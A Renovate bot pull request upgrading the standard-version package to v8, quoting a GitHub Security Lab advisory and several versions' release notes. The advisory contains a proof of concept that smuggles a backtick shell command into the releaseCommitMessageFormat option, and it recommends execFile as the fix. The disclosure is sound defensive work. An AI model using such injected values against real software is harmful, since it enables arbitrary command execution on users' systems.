chore(deps): update devdependency standard-version to v8 [security] #67


Open: wants to merge 1 commit into base: master

Conversation

renovate[bot] (Contributor) commented Aug 6, 2024

This PR contains the following updates:

Package: standard-version
Change: ^4.4.0 -> ^8.0.0
Age / Adoption / Passing / Confidence: badge images (not rendered)

GitHub Vulnerability Alerts

GHSA-7xcx-6wjh-7xp2

GitHub Security Lab (GHSL) Vulnerability Report: GHSL-2020-111

The GitHub Security Lab team has identified a potential security vulnerability in standard-version.

Summary

The standardVersion function has a command injection vulnerability. Clients of the standard-version library are unlikely to be aware of this, so they might unwittingly write code that contains a vulnerability.

Product

Standard Version

Tested Version

Commit 2f04ac8

Details

Issue 1: Command injection in standardVersion

The following proof-of-concept illustrates the vulnerability. First install Standard Version and create an empty git repo to run the PoC in:

npm install standard-version
git init
echo "foo" > foo.txt # the git repo has to be non-empty
git add foo.txt
git commit -am "initial commit"

Now create a file with the following contents:

var fs = require("fs");
// setting up a bit of environment
fs.writeFileSync("package.json", '{"name": "foo", "version": "1.0.0"}');

const standardVersion = require('standard-version')

standardVersion({
  noVerify: true,
  infile: 'foo.txt',
  releaseCommitMessageFormat: "bla `touch exploit`"
})

and run it:

node test.js

Notice that a file named exploit has been created.

This vulnerability is similar to command injection vulnerabilities that have been found in other JavaScript libraries. Here are some examples:
CVE-2020-7646,
CVE-2020-7614,
CVE-2020-7597,
CVE-2019-10778,
CVE-2019-10776,
CVE-2018-16462,
CVE-2018-16461,
CVE-2018-16460,
CVE-2018-13797,
CVE-2018-3786,
CVE-2018-3772,
CVE-2018-3746,
CVE-2017-16100,
CVE-2017-16042.

We have written a CodeQL query, which automatically detects this vulnerability. You can see the results of the query on the standard-version project here.

Impact

This issue may lead to remote code execution if a client of the library calls the vulnerable method with untrusted input.

Remediation

We recommend not using an API that can interpret a string as a shell command. For example, use child_process.execFile instead of child_process.exec.

Credit

This issue was discovered and reported by GitHub Engineer @erik-krogh (Erik Krogh Kristensen).

Contact

You can contact the GHSL team at securitylab@github.com; please include GHSL-2020-111 in any communication regarding this issue.

Disclosure Policy

This report is subject to our coordinated disclosure policy.


Release Notes

conventional-changelog/standard-version (standard-version)

v8.0.1

v8.0.0

⚠ BREAKING CHANGES
  • composer.json and composer.lock will no longer be read from or bumped by default. If you need to obtain a version or write a version to these files, please use bumpFiles and/or packageFiles options accordingly.
Bug Fixes
  • composer.json and composer.lock have been removed from default package and bump files. (c934f3a), closes #495 #394
  • deps: update dependency conventional-changelog to v3.1.18 (#510) (e6aeb77)
  • deps: update dependency yargs to v15.1.0 (#518) (8f36f9e)
  • deps: update dependency yargs to v15.3.1 (#559) (d98cd46)

v7.1.0

Features
  • Adds support for header (--header) configuration based on the spec. (#364) (ba80a0c)
  • custom 'bumpFiles' and 'packageFiles' support (#372) (564d948)
Bug Fixes
  • deps: update dependency conventional-changelog to v3.1.15 (#479) (492e721)
  • deps: update dependency conventional-changelog-conventionalcommits to v4.2.3 (#496) (bc606f8)
  • deps: update dependency conventional-recommended-bump to v6.0.5 (#480) (1e1e215)
  • deps: update dependency yargs to v15 (#484) (35b90c3)
  • use require.resolve for the default preset (#465) (d557372)
  • deps: update dependency detect-newline to v3.1.0 (#482) (04ab36a)
  • deps: update dependency figures to v3.1.0 (#468) (63300a9)
  • deps: update dependency git-semver-tags to v3.0.1 (#485) (9cc188c)
  • deps: update dependency yargs to v14.2.1 (#483) (dc1fa61)
  • deps: update dependency yargs to v14.2.2 (#488) (ecf26b6)
7.0.1 (2019-11-07)
Bug Fixes
  • deps: update dependency conventional-changelog to v3.1.12 (#463) (f04161a)
  • deps: update dependency conventional-changelog-config-spec to v2.1.0 (#442) (a2c5747)
  • deps: update dependency conventional-recommended-bump to v6.0.2 (#462) (84bb581)
  • deps: update dependency stringify-package to v1.0.1 (#459) (e06a835)
  • deps: update dependency yargs to v14 (#440) (fe37e73)
  • deps: update dependency yargs to v14.2.0 (#461) (fb21851)

v7.0.1

v7.0.0

⚠ BREAKING CHANGES
  • we were accepting .version.json as a config file, rather than .versionrc.json
Bug Fixes
  • bump: transmit tag prefix argument to conventionalRecommendedBump (#393) (8205222)
  • cli: display only one, correct default for --preset flag (#377) (d17fc81)
  • commit: don't try to process and add changelog if skipped (#318) (3e4fdec)
  • deps: update dependency conventional-changelog-config-spec to v2 (#352) (f586844)
  • deps: update dependency conventional-recommended-bump to v6 (#417) (4c5cad1)
  • deps: update dependency find-up to v4 (#355) (73b35f8)
  • deps: update dependency find-up to v4.1.0 (#383) (b621a4a)
  • deps: update dependency git-semver-tags to v3 (#418) (1ce3f4a)
  • deps: update dependency semver to v6.3.0 (#366) (cd866c7)
  • deps: update dependency yargs to v13.3.0 (#401) (3d0e8c7)
  • adds support for releaseCommitMessageFormat (#351) (a7133cc)
  • stop suggesting npm publish if package.json was not updated (#319) (a5ac845)
  • Updates package.json to actual supported (tested) NodeJS versions. (#379) (15eec8a)
  • deps: update dependency yargs to v13.2.4 (#356) (00b2ce6)
  • update config file name in command based on README.md (#357) (ce44dd2)
6.0.1 (2019-05-05)
Bug Fixes
  • don't pass args to git rev-parse (1ac72f7)

v6.0.1

v6.0.0

BREAKING CHANGES
  • we now bump the minor rather than major if version < 1.0.0; --release-as can be used to bump to 1.0.0.
  • tests are no longer run for Node 6
  • we now use the conventionalcommits preset by default, which directly tracks conventionalcommits.org.

v5.0.2

v5.0.1

Bug Fixes
  • make pattern for finding CHANGELOG sections work for non anchors (#292) (b684c78)

v5.0.0

BREAKING CHANGES
  • if no package.json, bower.json, etc., is found, we now fallback to git tags
  • removed Node 4/5 from testing matrix

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.


  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.
